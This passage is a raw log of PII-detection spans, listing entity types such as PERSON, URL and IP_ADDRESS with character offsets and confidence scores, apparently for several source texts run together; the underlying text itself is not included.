0.85, type: PERSON, start: 18352, end: 18380, score: 0.85, type: PERSON, start: 18783, end: 18802, score: 0.85, type: PERSON, start: 18970, end: 18981, score: 0.85, type: LOCATION, start: 20866, end: 20886, score: 0.85, type: PERSON, start: 21816, end: 21826, score: 0.85, type: URL, start: 22164, end: 22173, score: 0.85, type: URL, start: 106, end: 160, score: 0.6, type: URL, start: 214, end: 265, score: 0.6, type: URL, start: 386, end: 467, score: 0.6, type: URL, start: 1704, end: 1770, score: 0.6, type: URL, start: 2714, end: 2771, score: 0.6, type: URL, start: 2823, end: 2889, score: 0.6, type: URL, start: 2990, end: 3052, score: 0.6, type: URL, start: 3310, end: 3386, score: 0.6, type: URL, start: 3695, end: 3753, score: 0.6, type: URL, start: 3846, end: 3906, score: 0.6, type: URL, start: 4020, end: 4081, score: 0.6, type: URL, start: 4598, end: 4659, score: 0.6, type: URL, start: 4708, end: 4773, score: 0.6, type: URL, start: 4936, end: 4995, score: 0.6, type: URL, start: 5024, end: 5084, score: 0.6, type: URL, start: 5117, end: 5177, score: 0.6, type: URL, start: 5210, end: 5268, score: 0.6, type: URL, start: 5378, end: 5457, score: 0.6, type: URL, start: 6102, end: 6167, score: 0.6, type: URL, start: 6400, end: 6480, score: 0.6, type: URL, start: 6616, end: 6679, score: 0.6, type: URL, start: 6757, end: 6819, score: 0.6, type: URL, start: 7029, end: 7111, score: 0.6, type: URL, start: 7368, end: 7430, score: 0.6, type: URL, start: 7484, end: 7545, score: 0.6, type: URL, start: 8641, end: 8700, score: 0.6, type: URL, start: 8900, end: 8951, score: 0.6, type: URL, start: 10283, end: 10344, score: 0.6, type: URL, start: 12209, end: 12274, score: 0.6, type: URL, start: 12426, end: 12485, score: 0.6, type: URL, start: 12548, end: 12629, score: 0.6, type: URL, start: 12732, end: 12813, score: 0.6, type: URL, start: 13038, end: 13081, score: 0.6, type: URL, start: 13411, end: 13473, score: 0.6, type: URL, start: 14249, end: 14314, score: 0.6, type: URL, start: 14739, end: 14791, score: 0.6, type: IP_ADDRESS, start: 14950, end: 14959, score: 0.6, type: URL, start: 17309, end: 17366, score: 0.6, type: URL, start: 17396, end: 17462, score: 0.6, type: URL, start: 17563, end: 17625, score: 0.6, type: URL, start: 17883, end: 17959, score: 0.6, type: URL, start: 18268, end: 18326, score: 0.6, type: URL, start: 18419, end: 18479, score: 0.6, type: URL, start: 18593, end: 18654, score: 0.6, type: URL, start: 19099, end: 19160, score: 0.6, type: URL, start: 19211, end: 19276, score: 0.6, type: URL, start: 19317, end: 19376, score: 0.6, type: URL, start: 19405, end: 19465, score: 0.6, type: URL, start: 19498, end: 19558, score: 0.6, type: URL, start: 19591, end: 19649, score: 0.6, type: URL, start: 19759, end: 19838, score: 0.6, type: URL, start: 20483, end: 20548, score: 0.6, type: URL, start: 20781, end: 20861, score: 0.6, type: URL, start: 20997, end: 21060, score: 0.6, type: URL, start: 21138, end: 21200, score: 0.6, type: URL, start: 21410, end: 21492, score: 0.6, type: URL, start: 21749, end: 21811, score: 0.6, type: URL, start: 21865, end: 21926, score: 0.6, type: URL, start: 22986, end: 23045, score: 0.6, type: URL, start: 23245, end: 23296, score: 0.6, type: URL, start: 315, end: 325, score: 0.5, type: URL, start: 358, end: 363, score: 0.5, type: URL, start: 531, end: 547, score: 0.5, type: URL, start: 710, end: 715, score: 0.5, type: URL, start: 726, end: 731, score: 0.5, type: URL, start: 878, end: 895, score: 0.5, type: URL, start: 909, end: 926, score: 0.5, type: URL, start: 948, end: 965, score: 0.5, type: URL, start: 983, end: 1000, score: 0.5, type: URL, start: 1015, end: 1032, score: 0.5, type: URL, start: 1050, end: 1067, score: 0.5, type: URL, start: 1123, end: 1140, score: 0.5, type: URL, start: 1192, end: 1209, score: 0.5, type: URL, start: 1224, end: 1241, score: 0.5, type: URL, start: 2009, end: 2019, score: 0.5, type: URL, start: 2052, end: 2062, score: 0.5, type: URL, start: 2212, end: 2249, score: 0.5, type: URL, start: 2276, end: 2304, score: 0.5, type: URL, start: 2382, end: 2415, score: 0.5, type: URL, start: 2449, end: 2486, score: 0.5, type: URL, start: 2513, end: 2533, score: 0.5, type: URL, start: 2591, end: 2611, score: 0.5, type: URL, start: 2784, end: 2793, score: 0.5, type: URL, start: 3161, end: 3170, score: 0.5, type: URL, start: 3547, end: 3556, score: 0.5, type: URL, start: 3561, end: 3589, score: 0.5, type: URL, start: 3815, end: 3824, score: 0.5, type: URL, start: 4435, end: 4455, score: 0.5, type: URL, start: 5503, end: 5525, score: 0.5, type: URL, start: 5531, end: 5544, score: 0.5, type: URL, start: 5558, end: 5576, score: 0.5, type: URL, start: 5582, end: 5595, score: 0.5, type: URL, start: 5612, end: 5636, score: 0.5, type: URL, start: 5642, end: 5655, score: 0.5, type: URL, start: 5678, end: 5692, score: 0.5, type: URL, start: 5698, end: 5711, score: 0.5, type: URL, start: 5726, end: 5740, score: 0.5, type: URL, start: 5773, end: 5787, score: 0.5, type: URL, start: 5793, end: 5806, score: 0.5, type: URL, start: 5821, end: 5835, score: 0.5, type: URL, start: 5841, end: 5854, score: 0.5, type: URL, start: 5870, end: 5884, score: 0.5, type: URL, start: 5890, end: 5903, score: 0.5, type: URL, start: 5915, end: 5941, score: 0.5, type: URL, start: 5947, end: 5960, score: 0.5, type: URL, start: 5978, end: 5992, score: 0.5, type: URL, start: 5998, end: 6011, score: 0.5, type: URL, start: 6272, end: 6298, score: 0.5, type: URL, start: 6703, end: 6708, score: 0.5, type: URL, start: 7149, end: 7186, score: 0.5, type: URL, start: 7212, end: 7241, score: 0.5, type: URL, start: 7931, end: 7962, score: 0.5, type: URL, start: 7984, end: 8002, score: 0.5, type: URL, start: 8005, end: 8016, score: 0.5, type: URL, start: 8387, end: 8395, score: 0.5, type: URL, start: 8545, end: 8555, score: 0.5, type: URL, start: 9185, end: 9204, score: 0.5, type: URL, start: 9409, end: 9428, score: 0.5, type: URL, start: 9504, end: 9513, score: 0.5, type: URL, start: 9851, end: 9860, score: 0.5, type: URL, start: 9981, end: 9990, score: 0.5, type: URL, start: 10138, end: 10147, score: 0.5, type: URL, start: 10152, end: 10180, score: 0.5, type: URL, start: 10659, end: 10680, score: 0.5, type: URL, start: 11053, end: 11066, score: 0.5, type: URL, start: 11116, end: 11129, score: 0.5, type: URL, start: 11221, end: 11230, score: 0.5, type: URL, start: 11267, end: 11292, score: 0.5, type: URL, start: 11334, end: 11368, score: 0.5, type: URL, start: 11455, end: 11464, score: 0.5, type: URL, start: 11720, end: 11729, score: 0.5, type: URL, start: 11770, end: 11779, score: 0.5, type: URL, start: 11830, end: 11839, score: 0.5, type: URL, start: 11888, end: 11897, score: 0.5, type: URL, start: 11942, end: 11951, score: 0.5, type: URL, start: 11999, end: 12008, score: 0.5, type: URL, start: 12051, end: 12060, score: 0.5, type: URL, start: 12680, end: 12691, score: 0.5, type: URL, start: 12838, end: 12847, score: 0.5, type: URL, start: 12887, end: 12896, score: 0.5, type: URL, start: 12938, end: 12947, score: 0.5, type: URL, start: 13636, end: 13645, score: 0.5, type: URL, start: 13678, end: 13687, score: 0.5, type: URL, start: 13707, end: 13716, score: 0.5, type: URL, start: 13721, end: 13738, score: 0.5, type: URL, start: 13767, end: 13776, score: 0.5, type: URL, start: 13861, end: 13870, score: 0.5, type: URL, start: 13950, end: 13960, score: 0.5, type: URL, start: 14048, end: 14057, score: 0.5, type: URL, start: 14350, end: 14376, score: 0.5, type: URL, start: 14405, end: 14431, score: 0.5, type: URL, start: 14908, end: 14917, score: 0.5, type: URL, start: 15117, end: 15126, score: 0.5, type: URL, start: 15292, end: 15313, score: 0.5, type: URL, start: 15477, end: 15505, score: 0.5, type: URL, start: 15882, end: 15899, score: 0.5, type: URL, start: 15913, end: 15930, score: 0.5, type: URL, start: 15952, end: 15969, score: 0.5, type: URL, start: 15987, end: 16004, score: 0.5, type: URL, start: 16019, end: 16036, score: 0.5, type: URL, start: 16054, end: 16071, score: 0.5, type: URL, start: 16127, end: 16144, score: 0.5, type: URL, start: 16179, end: 16196, score: 0.5, type: URL, start: 16665, end: 16675, score: 0.5, type: URL, start: 16708, end: 16718, score: 0.5, type: URL, start: 16868, end: 16905, score: 0.5, type: URL, start: 16932, end: 16960, score: 0.5, type: URL, start: 17038, end: 17071, score: 0.5, type: URL, start: 17105, end: 17142, score: 0.5, type: URL, start: 17169, end: 17189, score: 0.5, type: URL, start: 17734, end: 17743, score: 0.5, type: URL, start: 18120, end: 18129, score: 0.5, type: URL, start: 18134, end: 18162, score: 0.5, type: URL, start: 18388, end: 18397, score: 0.5, type: URL, start: 18936, end: 18956, score: 0.5, type: URL, start: 19884, end: 19906, score: 0.5, type: URL, start: 19912, end: 19925, score: 0.5, type: URL, start: 19939, end: 19957, score: 0.5, type: URL, start: 19963, end: 19976, score: 0.5, type: URL, start: 19993, end: 20017, score: 0.5, type: URL, start: 20023, end: 20036, score: 0.5, type: URL, start: 20059, end: 20073, score: 0.5, type: URL, start: 20079, end: 20092, score: 0.5, type: URL, start: 20107, end: 20121, score: 0.5, type: URL, start: 20154, end: 20168, score: 0.5, type: URL, start: 20174, end: 20187, score: 0.5, type: URL, start: 20202, end: 20216, score: 0.5, type: URL, start: 20222, end: 20235, score: 0.5, type: URL, start: 20251, end: 20265, score: 0.5, type: URL, start: 20271, end: 20284, score: 0.5, type: URL, start: 20296, end: 20322, score: 0.5, type: URL, start: 20328, end: 20341, score: 0.5, type: URL, start: 20359, end: 20373, score: 0.5, type: URL, start: 20379, end: 20392, score: 0.5, type: URL, start: 20653, end: 20679, score: 0.5, type: URL, start: 21084, end: 21089, score: 0.5, type: URL, start: 21530, end: 21567, score: 0.5, type: URL, start: 21593, end: 21622, score: 0.5, type: URL, start: 22312, end: 22343, score: 0.5, type: URL, start: 22365, end: 22383, score: 0.5, type: URL, start: 22386, end: 22397, score: 0.5, type: URL, start: 22732, end: 22740, score: 0.5, type: URL, start: 22890, end: 22900, score: 0.5, type: URL, start: 23530, end: 23549, score: 0.5, type: URL, start: 23754, end: 23773, score: 0.5, type: URL, start: 23849, end: 23858, score: 0.5, type: PERSON, start: 906, end: 920, score: 0.85, type: LOCATION, start: 976, end: 984, score: 0.85, type: PERSON, start: 3254, end: 3267, score: 0.85, type: PERSON, start: 4768, end: 4781, score: 0.85, type: PERSON, start: 5851, end: 5864, score: 0.85, type: PERSON, start: 6671, end: 6725, score: 0.85, type: PERSON, start: 7361, end: 7374, score: 0.85, type: PERSON, start: 9561, end: 9567, score: 0.85, type: PERSON, start: 9635, end: 9669, score: 0.85, type: PERSON, start: 10171, end: 10182, score: 0.85, type: PERSON, start: 10368, end: 10374, score: 0.85, type: PERSON, start: 11049, end: 11055, score: 0.85, type: URL, start: 238, end: 280, score: 0.6, type: URL, start: 784, end: 793, score: 0.5, type: URL, start: 1071, end: 1078, score: 0.5, type: URL, start: 1086, end: 1093, score: 0.5, type: URL, start: 1106, end: 1113, score: 0.5, type: URL, start: 1129, end: 1136, score: 0.5, type: URL, start: 1149, end: 1156, score: 0.5, type: URL, start: 1164, end: 1171, score: 0.5, type: URL, start: 1483, end: 1490, score: 0.5, type: URL, start: 1585, end: 1593, score: 0.5, type: URL, start: 1608, end: 1615, score: 0.5, type: URL, start: 1667, end: 1674, score: 0.5, type: URL, start: 1806, end: 1814, score: 0.5, type: URL, start: 1823, end: 1830, score: 0.5, type: URL, start: 2474, end: 2481, score: 0.5, type: URL, start: 2484, end: 2489, score: 0.5, type: URL, start: 2520, end: 2525, score: 0.5, type: URL, start: 2558, end: 2566, score: 0.5, type: URL, start: 2584, end: 2591, score: 0.5, type: URL, start: 2617, end: 2624, score: 0.5, type: URL, start: 2655, end: 2662, score: 0.5, type: URL, start: 2665, end: 2670, score: 0.5, type: URL, start: 2701, end: 2706, score: 0.5, type: URL, start: 2740, end: 2748, score: 0.5, type: URL, start: 2766, end: 2773, score: 0.5, type: URL, start: 2799, end: 2806, score: 0.5, type: URL, start: 2943, end: 2950, score: 0.5, type: URL, start: 2972, end: 2979, score: 0.5, type: URL, start: 2982, end: 2987, score: 0.5, type: URL, start: 3004, end: 3013, score: 0.5, type: URL, start: 3048, end: 3055, score: 0.5, type: URL, start: 3118, end: 3134, score: 0.5, type: URL, start: 3157, end: 3164, score: 0.5, type: URL, start: 3229, end: 3236, score: 0.5, type: URL, start: 3279, end: 3286, score: 0.5, type: URL, start: 3343, end: 3350, score: 0.5, type: URL, start: 3415, end: 3422, score: 0.5, type: URL, start: 3439, end: 3455, score: 0.5, type: URL, start: 3877, end: 3884, score: 0.5, type: URL, start: 3939, end: 3946, score: 0.5, type: URL, start: 4016, end: 4022, score: 0.5, type: URL, start: 4140, end: 4154, score: 0.5, type: URL, start: 4188, end: 4196, score: 0.5, type: URL, start: 4204, end: 4211, score: 0.5, type: URL, start: 4388, end: 4395, score: 0.5, type: URL, start: 4438, end: 4445, score: 0.5, type: URL, start: 4500, end: 4507, score: 0.5, type: URL, start: 4543, end: 4550, score: 0.5, type: URL, start: 4634, end: 4650, score: 0.5, type: URL, start: 4673, end: 4680, score: 0.5, type: URL, start: 4743, end: 4750, score: 0.5, type: URL, start: 4793, end: 4800, score: 0.5, type: URL, start: 4857, end: 4864, score: 0.5, type: URL, start: 4929, end: 4936, score: 0.5, type: URL, start: 4953, end: 4969, score: 0.5, type: URL, start: 5367, end: 5374, score: 0.5, type: URL, start: 5429, end: 5436, score: 0.5, type: URL, start: 5478, end: 5486, score: 0.5, type: URL, start: 5494, end: 5501, score: 0.5, type: URL, start: 5670, end: 5677, score: 0.5, type: URL, start: 5716, end: 5732, score: 0.5, type: URL, start: 5755, end: 5762, score: 0.5, type: URL, start: 5826, end: 5833, score: 0.5, type: URL, start: 5876, end: 5883, score: 0.5, type: URL, start: 5943, end: 5950, score: 0.5, type: URL, start: 6006, end: 6013, score: 0.5, type: URL, start: 6030, end: 6046, score: 0.5, type: URL, start: 6066, end: 6073, score: 0.5, type: URL, start: 6078, end: 6102, score: 0.5, type: URL, start: 6534, end: 6541, score: 0.5, type: URL, start: 6596, end: 6603, score: 0.5, type: URL, start: 6646, end: 6653, score: 0.5, type: URL, start: 6686, end: 6691, score: 0.5, type: URL, start: 6739, end: 6747, score: 0.5, type: URL, start: 6755, end: 6762, score: 0.5, type: URL, start: 7044, end: 7051, score: 0.5, type: URL, start: 7083, end: 7090, score: 0.5, type: URL, start: 7100, end: 7113, score: 0.5, type: URL, start: 7130, end: 7137, score: 0.5, type: URL, start: 7226, end: 7242, score: 0.5, type: URL, start: 7265, end: 7272, score: 0.5, type: URL, start: 7336, end: 7343, score: 0.5, type: URL, start: 7386, end: 7393, score: 0.5, type: URL, start: 7453, end: 7460, score: 0.5, type: URL, start: 7525, end: 7532, score: 0.5, type: URL, start: 7549, end: 7565, score: 0.5, type: URL, start: 7784, end: 7791, score: 0.5, type: URL, start: 7794, end: 7799, score: 0.5, type: URL, start: 7816, end: 7825, score: 0.5, type: URL, start: 7868, end: 7876, score: 0.5, type: URL, start: 7893, end: 7900, score: 0.5, type: URL, start: 8110, end: 8117, score: 0.5, type: URL, start: 8157, end: 8164, score: 0.5, type: URL, start: 8167, end: 8172, score: 0.5, type: URL, start: 8189, end: 8198, score: 0.5, type: URL, start: 8233, end: 8240, score: 0.5, type: URL, start: 8305, end: 8311, score: 0.5, type: URL, start: 8438, end: 8444, score: 0.5, type: URL, start: 8470, end: 8476, score: 0.5, type: URL, start: 8629, end: 8636, score: 0.5, type: URL, start: 8664, end: 8671, score: 0.5, type: URL, start: 8700, end: 8714, score: 0.5, type: URL, start: 8762, end: 8769, score: 0.5, type: URL, start: 8797, end: 8804, score: 0.5, type: URL, start: 8937, end: 8944, score: 0.5, type: URL, start: 8947, end: 8952, score: 0.5, type: URL, start: 8973, end: 8979, score: 0.5, type: URL, start: 9016, end: 9022, score: 0.5, type: URL, start: 9068, end: 9075, score: 0.5, type: URL, start: 9107, end: 9114, score: 0.5, type: URL, start: 9155, end: 9161, score: 0.5, type: URL, start: 9209, end: 9216, score: 0.5, type: URL, start: 9248, end: 9255, score: 0.5, type: URL, start: 9399, end: 9406, score: 0.5, type: URL, start: 9710, end: 9717, score: 0.5, type: URL, start: 9720, end: 9725, score: 0.5, type: URL, start: 9746, end: 9752, score: 0.5, type: URL, start: 9794, end: 9800, score: 0.5, type: URL, start: 9847, end: 9854, score: 0.5, type: URL, start: 9886, end: 9893, score: 0.5, type: URL, start: 9921, end: 9928, score: 0.5, type: URL, start: 9946, end: 9955, score: 0.5, type: URL, start: 9978, end: 9987, score: 0.5, type: URL, start: 10001, end: 10008, score: 0.5, type: URL, start: 10036, end: 10045, score: 0.5, type: URL, start: 10059, end: 10066, score: 0.5, type: URL, start: 10206, end: 10213, score: 0.5, type: URL, start: 10442, end: 10449, score: 0.5, type: URL, start: 10452, end: 10457, score: 0.5, type: URL, start: 10478, end: 10484, score: 0.5, type: URL, start: 10526, end: 10532, score: 0.5, type: URL, start: 10579, end: 10586, score: 0.5, type: URL, start: 10618, end: 10625, score: 0.5, type: URL, start: 10653, end: 10660, score: 0.5, type: URL, start: 10678, end: 10687, score: 0.5, type: URL, start: 10710, end: 10719, score: 0.5, type: URL, start: 10733, end: 10740, score: 0.5, type: URL, start: 10887, end: 10894, score: 0.5, type: URL, start: 11198, end: 11205, score: 0.5, type: URL, start: 11208, end: 11213, score: 0.5, type: URL, start: 11234, end: 11240, score: 0.5, type: URL, start: 11282, end: 11288, score: 0.5, type: URL, start: 11335, end: 11342, score: 0.5, type: URL, start: 11374, end: 11381, score: 0.5, type: URL, start: 11409, end: 11416, score: 0.5, type: URL, start: 11434, end: 11443, score: 0.5, type: URL, start: 11466, end: 11475, score: 0.5, type: URL, start: 11489, end: 11496, score: 0.5, type: URL, start: 11524, end: 11533, score: 0.5, type: URL, start: 11547, end: 11554, score: 0.5, type: URL, start: 11704, end: 11711, score: 0.5, type: URL, start: 11821, end: 11828, score: 0.5, type: URL, start: 11831, end: 11836, score: 0.5, type: URL, start: 11857, end: 11863, score: 0.5, type: URL, start: 11905, end: 11911, score: 0.5, type: URL, start: 11958, end: 11965, score: 0.5, type: URL, start: 11997, end: 12004, score: 0.5, type: URL, start: 12038, end: 12047, score: 0.5, type: PERSON, start: 1071, end: 1103, score: 0.85, type: NRP, start: 2073, end: 2080, score: 0.85, type: PERSON, start: 4060, end: 4068, score: 0.85, type: PERSON, start: 5317, end: 5322, score: 0.85, type: PERSON, start: 6018, end: 6022, score: 0.85, type: PERSON, start: 6150, end: 6163, score: 0.85, type: PERSON, start: 7295, end: 7308, score: 0.85, type: LOCATION, start: 8057, end: 8067, score: 0.85, type: URL, start: 1330, end: 1421, score: 0.6, type: URL, start: 6190, end: 6230, score: 0.6, type: URL, start: 50, end: 80, score: 0.5, type: URL, start: 138, end: 164, score: 0.5, type: URL, start: 196, end: 215, score: 0.5, type: URL, start: 241, end: 253, score: 0.5, type: URL, start: 432, end: 438, score: 0.5, type: URL, start: 456, end: 463, score: 0.5, type: URL, start: 468, end: 475, score: 0.5, type: URL, start: 539, end: 545, score: 0.5, type: URL, start: 606, end: 618, score: 0.5, type: URL, start: 623, end: 630, score: 0.5, type: URL, start: 653, end: 660, score: 0.5, type: URL, start: 698, end: 703, score: 0.5, type: URL, start: 1164, end: 1168, score: 0.5, type: URL, start: 1197, end: 1206, score: 0.5, type: URL, start: 1635, end: 1644, score: 0.5, type: URL, start: 1713, end: 1720, score: 0.5, type: URL, start: 1820, end: 1827, score: 0.5, type: URL, start: 2083, end: 2090, score: 0.5, type: URL, start: 2395, end: 2404, score: 0.5, type: URL, start: 2511, end: 2518, score: 0.5, type: URL, start: 2585, end: 2592, score: 0.5, type: URL, start: 2698, end: 2705, score: 0.5, type: URL, start: 2842, end: 2849, score: 0.5, type: URL, start: 2965, end: 2971, score: 0.5, type: URL, start: 3033, end: 3055, score: 0.5, type: URL, start: 3069, end: 3075, score: 0.5, type: URL, start: 3147, end: 3153, score: 0.5, type: URL, start: 3252, end: 3259, score: 0.5, type: URL, start: 3314, end: 3324, score: 0.5, type: URL, start: 3364, end: 3375, score: 0.5, type: URL, start: 3645, end: 3654, score: 0.5, type: URL, start: 4165, end: 4174, score: 0.5, type: URL, start: 4693, end: 4700, score: 0.5, type: URL, start: 4737, end: 4746, score: 0.5, type: URL, start: 4770, end: 4791, score: 0.5, type: URL, start: 5204, end: 5211, score: 0.5, type: URL, start: 5335, end: 5342, score: 0.5, type: URL, start: 5930, end: 5937, score: 0.5, type: URL, start: 6526, end: 6538, score: 0.5, type: URL, start: 6649, end: 6676, score: 0.5, type: URL, start: 6930, end: 6937, score: 0.5, type: URL, start: 7376, end: 7383, score: 0.5, type: URL, start: 7529, end: 7536, score: 0.5, type: URL, start: 7720, end: 7726, score: 0.5, type: URL, start: 8290, end: 8296, score: 0.5, type: DATE_TIME, start: 12, end: 21, score: 0.85, type: PERSON, start: 699, end: 712, score: 0.85, type: PERSON, start: 798, end: 811, score: 0.85, type: PERSON, start: 1625, end: 1638, score: 0.85, type: LOCATION, start: 1774, end: 1814, score: 0.85, type: PERSON, start: 1893, end: 1906, score: 0.85, type: PERSON, start: 1967, end: 1980, score: 0.85, type: PERSON, start: 2497, end: 2510, score: 0.85, type: PERSON, start: 3085, end: 3098, score: 0.85, type: PERSON, start: 3184, end: 3197, score: 0.85, type: PERSON, start: 3552, end: 3565, score: 0.85, type: PERSON, start: 3651, end: 3664, score: 0.85, type: PERSON, start: 3727, end: 3740, score: 0.85, type: PERSON, start: 3742, end: 3808, score: 0.85, type: PERSON, start: 3811, end: 3824, score: 0.85, type: PERSON, start: 4391, end: 4404, score: 0.85, type: PERSON, start: 4490, end: 4503, score: 0.85, type: PERSON, start: 4566, end: 4579, score: 0.85, type: PERSON, start: 4581, end: 4647, score: 0.85, type: PERSON, start: 4650, end: 4663, score: 0.85, type: PERSON, start: 4739, end: 4752, score: 0.85, type: NRP, start: 5342, end: 5387, score: 0.85, type: PERSON, start: 5473, end: 5486, score: 0.85, type: PERSON, start: 5574, end: 5587, score: 0.85, type: PERSON, start: 5786, end: 5799, score: 0.85, type: PERSON, start: 6818, end: 6831, score: 0.85, type: PERSON, start: 7290, end: 7303, score: 0.85, type: PERSON, start: 7766, end: 7779, score: 0.85, type: URL, start: 217, end: 259, score: 0.6, type: IP_ADDRESS, start: 6939, end: 6948, score: 0.6, type: IP_ADDRESS, start: 7049, end: 7058, score: 0.6, type: IP_ADDRESS, start: 7412, end: 7421, score: 0.6, type: IP_ADDRESS, start: 7524, end: 7533, score: 0.6, type: IP_ADDRESS, start: 7898, end: 7907, score: 0.6, type: IP_ADDRESS, start: 8047, end: 8056, score: 0.6, type: URL, start: 638, end: 645, score: 0.5, type: URL, start: 657, end: 665, score: 0.5, type: URL, start: 669, end: 683, score: 0.5, type: URL, start: 715, end: 722, score: 0.5, type: URL, start: 739, end: 747, score: 0.5, type: URL, start: 751, end: 765, score: 0.5, type: URL, start: 918, end: 928, score: 0.5, type: URL, start: 983, end: 991, score: 0.5, type: URL, start: 1029, end: 1043, score: 0.5, type: URL, start: 1083, end: 1093, score: 0.5, type: URL, start: 1148, end: 1156, score: 0.5, type: URL, start: 1196, end: 1210, score: 0.5, type: URL, start: 1250, end: 1260, score: 0.5, type: URL, start: 1314, end: 1322, score: 0.5, type: URL, start: 1362, end: 1376, score: 0.5, type: URL, start: 1416, end: 1426, score: 0.5, type: URL, start: 1480, end: 1488, score: 0.5, type: URL, start: 1522, end: 1536, score: 0.5, type: URL, start: 1561, end: 1568, score: 0.5, type: URL, start: 1580, end: 1588, score: 0.5, type: URL, start: 1593, end: 1607, score: 0.5, type: URL, start: 1736, end: 1744, score: 0.5, type: URL, start: 1781, end: 1795, score: 0.5, type: URL, start: 1839, end: 1846, score: 0.5, type: URL, start: 1858, end: 1866, score: 0.5, type: URL, start: 1871, end: 1885, score: 0.5, type: URL, start: 1909, end: 1916, score: 0.5, type: URL, start: 1928, end: 1936, score: 0.5, type: URL, start: 1941, end: 1955, score: 0.5, type: URL, start: 2057, end: 2071, score: 0.5, type: URL, start: 2099, end: 2109, score: 0.5, type: URL, start: 2123, end: 2129, score: 0.5, type: URL, start: 2150, end: 2164, score: 0.5, type: URL, start: 2219, end: 2233, score: 0.5, type: URL, start: 2282, end: 2296, score: 0.5, type: URL, start: 2313, end: 2319, score: 0.5, type: URL, start: 2349, end: 2363, score: 0.5, type: URL, start: 2414, end: 2421, score: 0.5, type: URL, start: 2438, end: 2446, score: 0.5, type: URL, start: 2901, end: 2910, score: 0.5, type: URL, start: 2950, end: 2964, score: 0.5, type: URL, start: 3002, end: 3009, score: 0.5, type: URL, start: 3026, end: 3034, score: 0.5, type: URL, start: 3102, end: 3109, score: 0.5, type: URL, start: 3126, end: 3134, score: 0.5, type: URL, start: 3139, end: 3153, score: 0.5, type: URL, start: 3376, end: 3383, score: 0.5, type: URL, start: 3417, end: 3431, score: 0.5, type: URL, start: 3469, end: 3476, score: 0.5, type: URL, start: 3493, end: 3501, score: 0.5, type: URL, start: 3569, end: 3576, score: 0.5, type: URL, start: 3593, end: 3601, score: 0.5, type: URL, start: 3606, end: 3620, score: 0.5, type: URL, start: 3668, end: 3675, score: 0.5, type: URL, start: 3687, end: 3695, score: 0.5, type: URL, start: 3700, end: 3714, score: 0.5, type: URL, start: 3743, end: 3750, score: 0.5, type: URL, start: 3762, end: 3770, score: 0.5, type: URL, start: 3775, end: 3789, score: 0.5, type: URL, start: 4055, end: 4065, score: 0.5, type: URL, start: 4119, end: 4126, score: 0.5, type: URL, start: 4187, end: 4201, score: 0.5, type: URL, start: 4259, end: 4269, score: 0.5, type: URL, start: 4295, end: 4302, score: 0.5, type: URL, start: 4308, end: 4315, score: 0.5, type: URL, start: 4332, end: 4340, score: 0.5, type: URL, start: 4408, end: 4415, score: 0.5, type: URL, start: 4432, end: 4440, score: 0.5, type: URL, start: 4445, end: 4459, score: 0.5, type: URL, start: 4507, end: 4514, score: 0.5, type: URL, start: 4526, end: 4534, score: 0.5, type: URL, start: 4539, end: 4553, score: 0.5, type: URL, start: 4582, end: 4589, score: 0.5, type: URL, start: 4601, end: 4609, score: 0.5, type: URL, start: 4614, end: 4628, score: 0.5, type: URL, start: 4666, end: 4673, score: 0.5, type: URL, start: 4685, end: 4693, score: 0.5, type: URL, start: 4698, end: 4712, score: 0.5, type: URL, start: 5027, end: 5037, score: 0.5, type: URL, start: 5087, end: 5093, score: 0.5, type: URL, start: 5146, end: 5153, score: 0.5, type: URL, start: 5214, end: 5228, score: 0.5, type: URL, start: 5285, end: 5295, score: 0.5, type: URL, start: 5321, end: 5328, score: 0.5, type: URL, start: 5370, end: 5376, score: 0.5, type: URL, start: 5393, end: 5400, score: 0.5, type: URL, start: 5417, end: 5425, score: 0.5, type: URL, start: 5490, end: 5497, score: 0.5, type: URL, start: 5514, end: 5522, score: 0.5, type: URL, start: 5591, end: 5598, score: 0.5, type: URL, start: 5615, end: 5623, score: 0.5, type: URL, start: 5628, end: 5642, score: 0.5, type: URL, start: 5706, end: 5713, score: 0.5, type: URL, start: 5730, end: 5738, score: 0.5, type: URL, start: 5743, end: 5757, score: 0.5, type: URL, start: 6083, end: 6092, score: 0.5, type: URL, start: 6097, end: 6105, score: 0.5, type: URL, start: 6107, end: 6123, score: 0.5, type: URL, start: 6147, end: 6157, score: 0.5, type: URL, start: 6208, end: 6220, score: 0.5, type: URL, start: 6269, end: 6279, score: 0.5, type: URL, start: 6320, end: 6330, score: 0.5, type: URL, start: 6376, end: 6387, score: 0.5, type: URL, start: 6402, end: 6412, score: 0.5, type: URL, start: 6476, end: 6483, score: 0.5, type: URL, start: 6521, end: 6535, score: 0.5, type: URL, start: 6758, end: 6765, score: 0.5, type: URL, start: 6777, end: 6785, score: 0.5, type: URL, start: 6790, end: 6804, score: 0.5, type: URL, start: 6909, end: 6925, score: 0.5, type: URL, start: 7023, end: 7033, score: 0.5, type: URL, start: 7107, end: 7121, score: 0.5, type: URL, start: 7230, end: 7237, score: 0.5, type: URL, start: 7249, end: 7257, score: 0.5, type: URL, start: 7262, end: 7276, score: 0.5, type: URL, start: 7382, end: 7398, score: 0.5, type: URL, start: 7498, end: 7508, score: 0.5, type: URL, start: 7582, end: 7596, score: 0.5, type: URL, start: 7706, end: 7713, score: 0.5, type: URL, start: 7725, end: 7733, score: 0.5, type: URL, start: 7738, end: 7752, score: 0.5, type: URL, start: 7868, end: 7884, score: 0.5, type: URL, start: 8009, end: 8019, score: 0.5, type: URL, start: 8121, end: 8135, score: 0.5, type: EMAIL_ADDRESS, start: 50, end: 65, score: 1.0, type: EMAIL_ADDRESS, start: 101, end: 116, score: 1.0, type: EMAIL_ADDRESS, start: 151, end: 166, score: 1.0, type: EMAIL_ADDRESS, start: 199, end: 214, score: 1.0, type: EMAIL_ADDRESS, start: 252, end: 267, score: 1.0, type: EMAIL_ADDRESS, start: 297, end: 312, score: 1.0, type: EMAIL_ADDRESS, start: 351, end: 366, score: 1.0, type: DATE_TIME, start: 16, end: 25, score: 0.85, type: DATE_TIME, start: 27, end: 36, score: 0.85, type: PERSON, start: 37, end: 49, score: 0.85, type: DATE_TIME, start: 82, end: 91, score: 0.85, type: PERSON, start: 92, end: 100, score: 0.85, type: PERSON, start: 188, end: 198, score: 0.85, type: PERSON, start: 236, end: 251, score: 0.85, type: DATE_TIME, start: 284, end: 288, score: 0.85, type: PERSON, start: 289, end: 296, score: 0.85, type: DATE_TIME, start: 329, end: 333, score: 0.85, type: PERSON, start: 334, end: 350, score: 0.85, type: PERSON, start: 2558, end: 2582, score: 0.85, type: PERSON, start: 7847, end: 7857, score: 0.85, type: PERSON, start: 8918, end: 8927, score: 0.85, type: PERSON, start: 9564, end: 9573, score: 0.85, type: 